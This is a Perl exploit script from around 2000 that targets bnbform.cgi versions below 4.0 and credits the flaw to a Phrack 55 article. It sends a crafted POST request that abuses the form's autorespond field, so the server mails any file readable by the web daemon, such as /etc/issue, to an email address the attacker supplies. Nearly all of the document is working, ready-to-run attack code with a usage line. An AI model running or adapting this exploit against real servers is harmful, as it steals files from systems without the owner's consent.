#!/usr/bin/perl -w

##  bnbform.cgi exploit - discovered in Phrack55, 
##  article p55-07 by whisker author, rain.forest.puppy.
##  The article is about Perl CGI problems, and is very
##  interesting reading - well, done! This exploit will
##  mail you any file readable by the httpd daemon.
##
##  All version below bnbform v4.0 are vulnerable.
##
## ./bnbform.pl hell.no cgi-bin me me@mail.com /etc/issue
##
##  - teleh0r@doglover.com / anno 2000 -
##        http://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 5) {
    print("Usage: $0 <target> <cgi-dir> <name> <email> <file>\n");
    exit(1);
}

my($target,$cgidir,$name,$email,$file,$length,
   $agent,$command,$sploit,$iaddr,$paddr,$proto);

($target,$cgidir,$name,$email,$file) = @ARGV;

print("\nRemote host: $target\n");
print("CGI-script: /$cgidir/bnbform.cgi\n");
print("File to retrieve: $file\n");

$file =~ s/\//%2F/g;
$length = 186 + length($name.$email.$file);
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

$command=
"name=$name&submit_by=$email&required=name&data_order=name".
"&autorespond=yes&automessage=$file&form_id=My+Test+Form";

$sploit=
"POST /$cgidir/bnbform.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

$iaddr = inet_aton($target)			|| die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)		|| die("Error: $!\n");
$proto = getprotobyname('tcp')			|| die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(3);
print("\nAll done - check your mail.\n");
exit(0);